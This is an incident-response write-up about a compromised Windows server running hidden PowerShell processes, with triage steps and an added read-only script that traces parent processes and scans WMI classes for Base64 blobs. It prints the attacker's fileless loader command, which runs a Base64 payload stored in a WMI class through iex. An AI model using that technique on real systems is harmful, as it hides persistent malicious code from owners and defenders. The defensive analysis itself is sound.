After the server was hacked...

After the server was compromised, the symptoms were:

  1. The java process had been killed
  2. Two powershell processes had appeared, with CPU usage close to 100%

Steps taken:

  1. Changed the PowerShell execution policy to prohibit PowerShell from running any scripts (Get-ExecutionPolicy shows the current execution policy; Set-ExecutionPolicy Restricted sets a policy under which no script files are allowed to run)
  2. Searched for information about PowerShell and found on the following page (https://social.technet.microsoft.com/Forums/zh-CN/8b80a46c-fce6-4804-9ea0-c8266ff638b1/powershell-cpu100?forum=WinServerPreviewZHCN) a tool, Process Monitor (download: https://docs.microsoft.com/en-us/sysinternals/downloads/procmon ), that can be used to monitor process details;
  3. Downloaded Process Monitor, unpacked and ran it, and clicked Filter to add a filter rule: (1) Process Name, (2) contains, (3) powershell. With the filter applied only the PowerShell processes are listed, and their details can be inspected. The command line of the process was:
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:systemcore_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:systemcore_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

  4. Found another page, "What if PowerShell is disabled? See how I use PowerShell to bypass application whitelists, environment restrictions, and antivirus software", which explains how to use the wmic command to view process details:
    wmic process list full > Desktop\save.txt

    According to that article, by following the parent process it may be possible to find out what invoked PowerShell, and from there where the attacker got in

  5. Some helpful netizens suggested reading this article: PowerShell Best Security Practices
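Two points from the steps above are worth making concrete for anyone triaging the same symptoms. First, Set-ExecutionPolicy Restricted only governs script files; the captured command line never loads a file, it pulls a Base64 string out of a WMI class (root\default:systemcore_Updater) and runs it with iex, which the execution policy does not stop. Second, the parent-process walk from step 4 and a look at what is stored in root\default can both be done from PowerShell itself with the CIM cmdlets, without exporting a wmic dump. The script below is an added triage example written for this write-up, not code from the original post or from the articles it links; it assumes a Windows host with PowerShell 5.1 or later, an elevated prompt, and that the 200-character threshold for "suspiciously long" string defaults is a constructed heuristic. It only reads; it does not kill processes or delete classes.

```powershell
# Added triage example (not part of the original post).
# Assumes: Windows, PowerShell 5.1+, run elevated. Read-only.

# --- 1. Parent-process chain for every running powershell.exe (step 4) ---
function Get-ProcessChain {
    param([int]$ProcessId)
    $chain = @()
    $seen  = @{}          # guards against PID reuse producing a cycle
    $current = $ProcessId
    while ($current -and -not $seen.ContainsKey($current)) {
        $seen[$current] = $true
        $p = Get-CimInstance Win32_Process -Filter "ProcessId = $current"
        if (-not $p) { break }   # parent already exited; chain ends here
        $chain += [pscustomobject]@{
            ProcessId   = $p.ProcessId
            Name        = $p.Name
            CommandLine = $p.CommandLine
        }
        $current = $p.ParentProcessId
    }
    return $chain
}

Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" | ForEach-Object {
    Write-Host "=== powershell.exe PID $($_.ProcessId) and its ancestors ==="
    Get-ProcessChain -ProcessId $_.ProcessId | Format-Table -AutoSize -Wrap
}

# --- 2. WMI classes in root\default holding long string defaults ---
# The captured command line reads its code from class properties in this
# namespace. Report every class-level string default over the threshold and,
# where it decodes as Base64, show the start of the decoded text.
$Threshold = 200   # constructed heuristic, adjust as needed

function Get-SuspiciousWmiDefaults {
    param([string]$Namespace = 'root\default', [int]$MinLength = $Threshold)
    foreach ($cls in Get-CimClass -Namespace $Namespace) {
        foreach ($prop in $cls.CimClassProperties) {
            $val = $prop.Value
            if ($prop.CimType -eq 'String' -and $val -and $val.Length -ge $MinLength) {
                $decoded = $null
                try {
                    $bytes   = [Convert]::FromBase64String($val)
                    $decoded = [Text.Encoding]::ASCII.GetString($bytes)
                } catch { }   # not Base64; leave $decoded empty
                [pscustomobject]@{
                    Class    = $cls.CimClassName
                    Property = $prop.Name
                    Length   = $val.Length
                    Preview  = if ($decoded) { $decoded.Substring(0, [Math]::Min(80, $decoded.Length)) }
                               else          { $val.Substring(0, [Math]::Min(80, $val.Length)) }
                }
            }
        }
    }
}

Get-SuspiciousWmiDefaults | Format-Table -AutoSize -Wrap
```

Run the first part before stopping the PowerShell processes, since the chain is lost once the parent exits; if the top of a chain is a service host, a scheduled task or wmiprvse.exe rather than an interactive shell, that is where the persistence lives and what needs to be removed together with the WMI class. Keep the output of both parts as evidence before remediating, and enable PowerShell script block logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) so that code executed through iex from a string is recorded next time.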
